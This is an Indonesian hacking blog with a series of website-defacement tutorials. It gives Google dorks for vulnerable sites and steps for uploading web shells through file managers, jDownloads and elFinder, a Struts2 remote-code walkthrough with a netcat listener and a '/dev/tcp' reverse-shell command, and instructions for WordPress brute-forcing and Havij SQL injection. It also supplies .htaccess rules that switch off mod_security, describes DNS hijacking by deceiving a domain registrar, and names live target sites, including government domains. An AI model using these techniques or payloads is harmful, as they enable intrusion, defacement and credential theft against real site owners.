Codes Xploit: Web Hacking
Pages
Showing posts with label Web Hacking. Show all posts
Showing posts with label Web Hacking. Show all posts

SQL Injections - Innovins

 
SQL Injections
SQL Injections - Innovins
===============================================================
Gw Anggap lu udah paham dengan SQL Injections
=====
Dork : intext:"Developed by - Innovins" .php?id=
Fresh Mirror baru 2 gw submit hehehe :)
Yo Silahkan Hajar ^_^
Join Grub juga : Join Here!!! & Sukai Fanspage kami di kanan pojok

Deface Dengan Responsive File Manager

 
kali ini gua bakal share cara deface dengan responsive file manager :''v
teknik ini cukup simpel karena cuman upload file trus akses shell :'''v
ok langsung saja
bahan :
dork:
plugins/filemanager/uploads/
tinymce/filemanager/uploads
jquery/filemanager/uploads
*kembangin gaes
shell ext .php.fla .php5 dll
contoh:eue.php.fla
Live target : http://tesda11.com/414c0a42459163bf6a993bd016b5aeb1/js/jscripts/tinymce/plugins/filemanager/dialog.php

Tutorial:

pertama tama kalean Dorking di google :''v klo udah dapet targetnya exploit dengan dialog.php
contoh:
site.com/path/filemanager/dialog.php
SS1












trus abis itu pencet bagian upload
SS2












abis itu upload shell klean :)
SS3












 XoXoXoXoXo mudah kan ?
SS4
akses shell ? site.com/path/filemanager/uploads/shell klean :''v
ok itu aja dari gue hehehehehe klo ada salah komen ya gan :)
oh iya jangan lupa Like FP kami ya :*

Deface Magento Add Admin

 

Magento Add Admin

Deface Magento Add Admin
Ok Guys, Sorry gw baru Share tadi agak sibuk jadi sekarang gw share sebelum tidur hehehe
Sebelum itu Download Bahan Dulu -> Download !!!
Dork : inurl:costumer/login
"Powered By Magento"
*Kembangin lagi , atau lu cari dork di blog" lain :)
Step:
Download tuh aplikas lalu buka & isi username dan password contoh daffa123 (isidenganbebas)
dan isi dengan target.

SS1
Lalu Klik Scan, Jika berhasil akan seperti ini :)

SS2
Tinggal Login , untuk login tambahin /admin/ di belakang target contoh target.com/admin/

SS3
Next nanti akan kasih tahu cara pasang shell , ngelog cc , & mendapatkan dollar paypal dari magento
Insyaallah , tapi itu gk gw tepati juga ya hahahaha :)

Tutorial Remote Code Exploit (Apache Struts2)

 

Cara Deface Dengan Apache Sruts2 ( Remote Code Execution)

yo apa kabar gaes :''v gue admin baru nih hehehe kali ini gue bakal share tutor tentang 
Apache struts2 Remote Code Execution
sedikit info tentang Remote Code Execution ini Remote Code execution adalah sebuah vulnrability yang memungkinkan si attacker untuk memberikan code code berbahaya seperti namanya Remote Code kita bisa meremote kode kode tersebut lalu mengirimnya ke web target 
yodah gk usah banyak cocot lagi :'v 
Yup Langsung saja
Bahan : 
Dork : intitle:"Struts Problem Report" intext:"development mode is enabled."
Python <- disini gaes 
jexboss <- disini gaes 
netcat <-  disini gaes 

Langsung Ke tutor

1.Buka CMD lalu ke folder jexboss nya

2.yang ke dua ketikkan 
python jexboss.py -u http://targetklean.com 
klo vuln ada bacaan vulnerable trus ketik yes
3.sekarang kita coba reverse shell
Buka Netcat nya trus ketikkan
nc -lnvp 123















habis itu ke jexbossnya yang berhasil kita exploit
4.ketikkan /bin/bash -i > /dev/tcp/ip/port 0>&1 2>&1\n
note: klo port mu blom di forward coba pakai ngrok















Klo port blom di forward cek tutor disini gaes Tutorial back conect with Ngrok (disni)

Done udah kita berhasil reverse shell tinggal di anuin

Vidionya Gaes : disini gaes 

klo hoki sih bisa di root :''v

Deface Xampp Local Write Access

 
Deface Xampp Local Write Access
Deface Xampp Local Write Access 
Dork :
  • inurl:/xampp/lang.php
  • inurl:/security/lang.php
Exploit : 
  • /xampp/lang.php?Hacked_By_FamilyAttackCyber Untuk Dork inurl:/xampp/lang.php
  • /security/lang.php?Hacked_By_FamilyAttackCyber Untuk Dork inurl:/security/lang.php
Live Demo Fresh :
http://metrologi.kemendag.go.id/xampp/

Masukkan Exploit jadi begini http://metrologi.kemendag.go.id/xampp/lang.php?Hacked_By_FamilyAttackCyber

Deface Xampp Local Write Access 1
 VULN Seperti gambar di atas ^_^ Lalu Langsung Cek deh Gimana Ceknya ?
/xampp/lang.tmp
/security/lang.tmp
Jadi kita pake yang /xampp/lang.tmp

Deface Xampp Local Write Access 2
 Gampang Kan ? Hehehehehe

Deface JDownloads Shell Upload

 
Deface JDownloads Shell Upload

Deface JDownloads Shell Upload
Dork :
Powered by jDownloads/index.php?option=com_jdownloads
inurl:/index.php?option=com_jdownloads intext:Powered by jDownloads
Live Demo Yang Segar : http://sekolahkirana.com/
Exploit : /index.php?option=com_jdownloads&Itemid=1&view=upload

Dorking Dahulu Dork nya atau bisa kita gunakan pake live demo :)
tambahkan  Exploit menjadi http://sekolahkirana.com/index.php?option=com_jdownloads&Itemid=1&view=upload atau http://sekolahkirana.com/index.php?option=com_jdownloads&Itemid=74&view=upload

SS - JDownloads

 Sebelum itu simpan lah Shell Yg Ext .php.php.j Contoh fac.php.php.j kalian bisa pake shell pribadi & buat yg ext .php.php.j . Setelah itu Klik Send File :) tapi setelah di upload bagian screenshot otomatis shell berubah menjadi .php.j :)
Akses Shell ? images/jdownloads/screenshots/namashell.php.j
Akan Seperti ini :)

SS2 - JDownloads

Sekian & Terimah Kasih Join grub ea FAC GRub

Deface Teknik Webdav

 
Deface Teknik Webdav

Deface Teknik Webdav
Banyak yang PM teknik ini, udh tau nih teknik gampang mending gw share aja dah :) bagi" ilmu juga wkkwkwkw :v
Download dahulu Toolsnya

Live Demo : 
http://doacoes.fussesp.sp.gov.br/
http://www.csirt.sp.gov.br/
Download, Ekstrak dan buka tuh tools

Hmei7 - 1

Simpan tuh Live demo di notepad lalu klik load file dan klik setting. Pada Name of Your Shell ganti dengan hckd.html atau bebas sih akhiran .html atau htm pada kotak write your shell isi dengan script deface lu abis itu klik serang

Hmei7 - 2

Hubblaaaa , Jika sukses seperti ini :) sekarang buka web nya deh jadi kaya gini http://doacoes.fussesp.sp.gov.br/hckd.html

SC Family Attack Cyber

Sekian & Terimah kasih :)

Kumpulan Arti Kode 401, 403, 404, 406, 500, 503, 509 Pada Website

 
Kumpulan Arti Kode 401, 403, 404, 406, 500, 503, 509 Pada Website

Kumpulan Arti Kode 401, 403, 404, 406, 500, 503, 509 Pada Website
Pernahkan Kalian ? saat mengakses login admin (Site.com/admin/) tapi 403 ? saat menambahkan site.com/login.php Bisa ? tapi saat login mengakses site.com/admin/ ? Kok bisa gitu ? mari kita pelajari selengkapnya di sini :)

Error 401 : Unauthorized
Status 401 Unauthorized, menyatakan website tidak memiliki hak akses untuk folder yang diproteksi oleh password seperti saat login admin lalu muncul Authentication.

Error 403 : Forbidden
Status 403 Forbidden, menyatakan bahwa saat  mengakses ke folder tujuan. lalu muncul 403 disebabkan oleh kesalahan pengaturan hak akses pada folder.

Error 404 : Not Found
Status 404 Not Found, menyatakan  file atau folder yang diminta, tidak ditemukan didalam database pada suatu website.

Error 406 : Not Acceptable
Status 406 Not Acceptable, menyatakan  permintaan dari browser tidak dapat dipenuhi oleh server.

Error 500 : Internal Server Error
Status 500 Internal Server Error, menyatakan ada kesalahan konfigurasi pada akun hosting.

Error 503 : Service Unavaible
Status 503 Service Unavaible, menyatakan server situs web tidak tersedia sekarang. Sebagian besar waktu ini adalah karena server terlalu sibuk atau karena ada yang pemeliharaan yang dilakukan di atasnya.

Error 509 : Bandwidth Limit Exceeded
Status 509 Bandwidth Limit Exceeded, menyatakan bahwa penggunaan bandwidth pada account hosting sudah melebihi quota yang ditetapkan untuk akun hosting pemilik website.

Demikian dari saya , pada kode tersebut mohon maaf jika ada kesalahan ini kan mau masuk ramadhan jadi kita saling maaf-maafaan :) Like Fanspage Guys ^_^ di sebelah kanan :)

Tool Untuk Memudahkan Deface , Pybelt

 
Tool Hacker Belt Pybelt

Tool Untuk Memudahkan Deface ,  Pybelt 

Jika kalian ingin melalukan peretasan mending gunakan Tools ini :) , mari kita Perkenalkan Tools Pybelt.
Pybelt adalah alat memudahkan peretas yang berbasis Python yang mampu memecahkan hash tanpa pengetahuan sebelumnya tentang algoritma, memindai port pada host tertentu, mencari kerentanan SQLi di URL yang diberikan, Mencari Website Dengan Google Dorks tanpa verikasi google, memverifikasi algoritme dari Hash yang diberikan, memindai URL untuk kerentanan XSS, dan menemukan proxy HTTP yang dapat digunakan.
Fitur - Fitur : 
  • Port Scanner
  • SQL Injection scanner
  • Dork Checker
  • Hash Cracker
  • Hash Type Verification
  • Proxy Finder
  • XSS Scanner
Untuk Melanjutkan Tahap Installan kalian install dahulu Python silahkan download di google ya :)
sekarang Download Dahulu Tool Nya :)


Ekstrak di Local disk C:\ biar mudah :) , dan ubah nama folder tersebut menjadi install ( bebas sih ganti nama aja biar mudah gw pake nama install ) lalu buka cmd dan ketik cd C:\install atau cd C:\ lalu cd install :)
Abis itu masukkan ini di cmd -> pip install -r requirements.txt
Lihat gambar biar ngerti ea 

SS1

Tunggu ampe selesai installan , jika selesai akan seperti ini :)

SS2

Selesai deh :) untuk gunakan Fitur lihat di bawah :
  • python pybelt.py -p 127.0.0.1 Scan Port pada host local
  • python pybelt.py -s http://example.com/php?id=2 Scan SQL 
  • python pybelt.py -d idea?id=55 Dork Scanner
  • python pybelt.py -c 9a8b1b7eee229046fc2701b228fc2aff:all Memecahkan hash menggunakan semua algoritma yang ada di komputer. 
  • python pybelt.py -v 098f6bcd4621d373cade4e832627b4f6 Mencari Verikasi Jenis HASH Seperti MD5
  • python pybelt.py -f Menemukan Proxy yang bisa di gunakan
  • python pybelt.py -x http://127.0.0.1/php?id=1 Mencari Isi Website untuk Kerengtanan XSS
Sekian dan Terimah kasih silahkan Like Fanspage kami biar makin Enjoy :) 

Step Step Membuat Dork Google For Pemula

 
Step Step Membuat Dork Google For Pemula

Step Step Membuat Dork Google For Pemula

 Kita ke pengertian nya dulu nanti jika akan lu pahamin & kembangkan :) woke ?
  
Intitle : Mencari suatu judul website contoh untuk mencari login admin intitle:admin login
allintitle: ini sama dengan intitle tapi ini akan mencari semua kata" yang kita urutin seperti admin login nanti mereka akan mencari semua judul yang telah kita tulis admin login
site:  untuk mencari website yang kita inginkan atau nama domain contoh site:facebook.com atau nama domain site:.id
Inurl : mencari string yang terdapat pada website seperti contoh berikut untuk mencari admin login inurl:admin/
Cache : nah untuk ini sangat berguna untuk web sedang down dan lu pada bisa melihat isinya (dari halaman cache) contoh : cache:selenagomez.com
Ext :  mencari suatu extensions seperti untuk upload file .php atau jpg (google support untuk ext adalah pdf,swf,rtf,doc,ppt,dwf,ps,kml,kmz,xls) contoh ext:.php
Related : mencari website yang mirip dengan website tertentu related:facebook.com

Jika kalian sudah hapal sekarang untuk membuat
disini gw mau membuat dork bypass admin.
-> inurl:admin site:.id intitle:Admin Shop
Sql Injection
-> inurl:news.php?id= "berita harian" site:.id
sudah paham ? jika belom masuk ke grup kami saja :)  ->  Family Attack Cyber

Kumpulan Code Untuk Bypass .Htaccess

 
Kumpulan Code Untuk Bypass .Htaccess

Kumpulan Code Untuk Bypass .Htaccess

Bete kagak Ngeblog rasa gimana gitu, yah meskipun sedang cuti team wkwkwkkwk :'v

Bypass mod security :

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

Bypass symlink :

Options All
Options +FollowSymLinks +Indexes
DirectoryIndex default.html
AddType text/html php

Atau Bisa juga :


OPTIONS Indexes Includes ExecCGI FollowSymLinks
AddHandler txt .php
AddHandler cgi-script .cgi
AddHandler cgi-script .pl
OPTIONS Indexes Includes ExecCGI FollowSymLinks
Options Indexes FollowSymLinks
AddType txt .php
AddType text/html .shtml
Options All
Options All

Bypass safe mode :

Options +FollowSymLinks
DirectoryIndex ssssss.htm
Options All Indexes
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
SetEnv PHPRC /home/user/public_html/php.ini
suPHP_ConfigPath /home/user/public_html/php.ini

Bypass 400


Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml

RUN SSI


AddType text/html .shtml
AddOutputFilter INCLUDES .shtml

RUN JPG KE PHP


AddHandler application/x-httpd-php .jpg .php

Sekian dari gw , Lanjutkan Ilmu mu ya wkwkkwkwk :'v

Deface DNS Hijacking With SOCENG ( Social Engineering)

 

Deface DNS Hijacking With SOCENG ( Social Engineering)

Deface DNS Hijacking With SOCENG ( Social Engineering)

lagi Populer tutor ini oleh Ceo PhantomGhost, w share aja biar laku wkkwkw tutor ini w pelajari dulu dari
https://ken7ester.blogspot.co.id/2015/08/tutorial-dns-hijacking-via-social.html
tapi w test beberapa website indo alhamdulillah masih bisa :) waktu itu w test web polrespriok.info yang domain di daftarkan e*z**m**r*.com w sensor :) , tapi berhasil dan w coba lagi web polres lain eh masih bisa waktu itu klo kgk salah polresjaktim dah gtw alamatnya w lupa, tapi ingat skrng indonesia susah di soceng web seperti rumahweb , idresseller , resellercamp , niaga , dll . mungkin sekarang masih ada kali yang masih bisa ok mari kita lanjut tutornya!!!

Sebelum itu kalian lihat domain di daftarkan dmna kalian bisa lihat whois indo di whois.web.id atau whois.domaintools.com

Percakapan w di e*z**m**r*.com
Admin : Selamat siang apakah bisa kami bantu
Gw : Mohon Maaf apakah e*z**m**r*.com sedang dalam ada kendala ?
admin : hmm, tidak ada emang kenapa ?
gw : tadi saya mau mengubah alamat dns domain , kok selalu mengalami kegagalan terus ? apakah bisa di bantu ?
admin : nama domainnya bapak ?
gw : maksudnya ? (waktu itu w Blm tau wkkwkwkkw).
Adminnya : nama domain web bapak!
gw : polrespriok.info
admin :  dns mana yg mau di arahkan ?
gw : dns1.idhostinger.com , dns2.idhostinger.com , dns3.idhostinger.com , dns4.idhostinger.com
admin : sudah kami setting 
gw : kira" dns ke ubah berapa lama ?
admin : sekitar 2 jam

Begitulah percakapan gw , tapi w serasa ada kepotong yah w lupa emng udh lama banget sih wkwkkwkw
maklum pelupa hahahha, tapi masih sama yg polresjaktim sama dalam 1 host tersebut , tapi saat w chat untuk beda orngnya wkkwkwkk :v kalo sama dengan kata" tersebut Mampus dah w :v
jika sudah ke ubah kalian tinggal parked domain tersebut & selesai dahhh :v
Begitulah tutor nya :) jika bingung atau kenapa" contact fanspage kami

Deface Wordpress Brute Force

 
Deface Wordpress Brute Force
Deface Wordpress Brute Force
Kebanyakkan Request Deface teknik ini, padahal simple tapi cuman kesabaran kgk simple :v.
Untuk itu Kalian Download Dahulu Tools nya atau kalian bisa liat post sebelumnya :)

Dork :
  • Author/admin "text"
  • inurl:wp-login.php
Silahkan Masukkan Target nya , coba kalian isi username dengan "admin" kalo ss seperti di bawah maka kita bisa eksekusi :)

SS1


tuh ss w gedein biar yg min , keliatan :v. mari kita lanjuttttttttttttttttt
Silahkan Copy File WP Brute force ke Local Disk C  , ini gw pake Yg versi 1 kalo kalian bebas pake yg mana saja yg penting Crootz.
Pastikan kalian saat Extrak file tuh , sudah dalam 1 Folder ea :).Silahkan pergi ke CMD nya :)  , masukkan Peritah cd C:\

SS2


Jika sudah kalian , menuju ke folder kalian contoh folder wp brute force gw , wp maka ketik cd wp. Lalu Ketik Nama Aplikasinya kalo gw WPBforce.exe

SS3

Crootz, Ea sekarang tinggal ketik "WPBforce.exe -url=http://target.com -user=admin -pass=wordlist.txt -threads=10". Tapi ingat WPBforce.exe itu kalian ganti dengan nama aplikasi wp brute force kalian. Kalian bisa lihat video tersebut

SS4

Video
Link :  https://www.youtube.com/embed/nfdPELPX8TM?ecver=2

Tutorial Deface dengan Wordpress Bruteforce [Perl]

 
Selamat pagi gan, pagi ini Idiot Attacker akan mengisi artikel di blog ini, biar tidak kelihatan sepi :D
kali ini Idiot Attacker akan membuat Artikel tentang Dunia peretasan lag, yaitu tentang Tutorial Deface dengan Wordpress Bruteforce [Perl].

Yup kali ini target CMS wordpress, yaitu dengan teknik Bruteforece

Apa Itu Bruteforce? Brute force ini adalah sebuah teknik serangan terhadap sebuah

Deface Onion.to File Upload

 
Deface Onion.to File Upload
Deface Onion.to File Upload
Tutor ini sekarang lagi Ngtreend & Simple , tapi ingat ya bukan Deepweb melaikan Fake Deepweb wkwkkw Mari kita Lanjut
Live : https://tt3j2x4k5ycaa5zt.onion.to/upload.php
Dork : inurl:upload site:.onion.to

SS1

 Pilih File , Abis itu URL Bebas & Klik Upload Done
https://tt3j2x4k5ycaa5zt.onion.to/uploads/03-2017/x.html
https://danwin1210.me/uploads/03-2017/x.html
Simple ? Kreasikan Terus ya :) 

Deface ctools File Upload

 
Family Attack Cyber
Demo : http://cybercrimecomplaints.com/imce?dir=.
Dork : inurl:"/imce?dir=" intitle:"File Browser"

Sukses http://cybercrimecomplaints.com/sites/default/files/common/index_18.html

Dorking Sql Wordpress User + PW with Phpmyadmin

 
Family Attack Cyber
Dorking Sql Wordpress User + PW with Phpmyadmin ? yap,nanti kita akan masuk sql web tersebut kita akan mencari user + pw wordpress.Tutor simple kok -_-
Dork : filetype:sql intext:wp_users phpmyadmin
Author: RuBiQc
kalian silahkan pilih" dulu webnya, kalian scroll ke bawah nanti akan ketemu beginian

Zeep kan ? biasanya login wordpress disini site.com/wp-login.php.
Hash di hashkiller.co.uk
Thx sudah baca guys Join Grub !

Deface File Upload Elfinder 2.0

 

Family Attack Cyber



Tutorial ini sama seperti Klik sini . Mungkin ada yang belom tau mari lanjut sadja bro
Dork : inurl:/elfinder/elfinder.html+intitle:"elFinder 2.0"
Live : http://sicofusion.com/var/ckeditor/elfinder/elfinder.html
Untuk aksesnya lihat gambar :

Yeah
 http://sicofusion.com/var/upload/index.html
Sekian ? dari w , semoga ilmu mu bertambah ya

Hacked By Family Attack Cyber

Deface Sqli With Havij

 
Your Site is Down!
pasti gw kalo buka facebook, ada pertanyaan seperti ini -_- , tutor ini kan simple mungkin ada yang belo tau yudh lah w share aja langsung boss kita lanjut..!!!
Live Demo : http://thephotoworld.in/gallery.php?id=Interior
Seperti di judul siapkan Tools Havij, silahkan kalian cari di tools hacking
kalian tambahkan ' di akhiran http://thephotoworld.in/gallery.php?id=Interior contoh http://thephotoworld.in/gallery.php?id=Interior'

Vuln
 yah mungkin tidak ada bacaan error blank gitu bisa di inject, buka havij nya taro linknya semua tanpa ' abis itu go dan akan jadi gini jika sukses

Havij
abis itu kalian klik tables , dan liat ss bro

Sukses
abis itu tinggal cari login admin, nach kalo web live itu login admin disini http://thephotoworld.in/admin/
dan jreng sukses :v

Masuk Dashboard
dah sekian dari gw eh saya :v join grub jika lo bingung Hmei7 Wes Here

Deface Dengan Admin Poor Password

 
Deface Dengan Admin Poor Password
Deface Dengan Admin Poor Password
Deface dengan Teknik ini Sangat simple sih karena cuman isi Username : admin password : admin
mungkin tingkat kebodohan sangat tinggi sangat mudah kejebol oleh sih attacker
Before 

Family Attack Cyber
After

Sukses
 Foto Bukti saat Sqli Injection di havij

Sqli Injection
 Mudah kan ? Ok, Sekian Tutor Simple untuk kalian semua semoga jadi Defacer yang baik tidak merusak :)
Subscribe to Newsletter

Popular Posts

© Copyright 2017 Codes Xploit. Designed by Infinite Haxor. Distributed by Infinite Haxor.